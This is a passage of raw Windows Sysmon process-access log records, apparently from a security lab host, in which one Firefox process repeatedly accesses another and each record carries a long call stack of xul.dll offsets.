Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.670{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.529{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.529{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.529{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.373{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.373{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.373{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.202{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.202{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.202{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:21.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:21.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:21.029{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.967{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.967{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000018500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.967{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.390{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 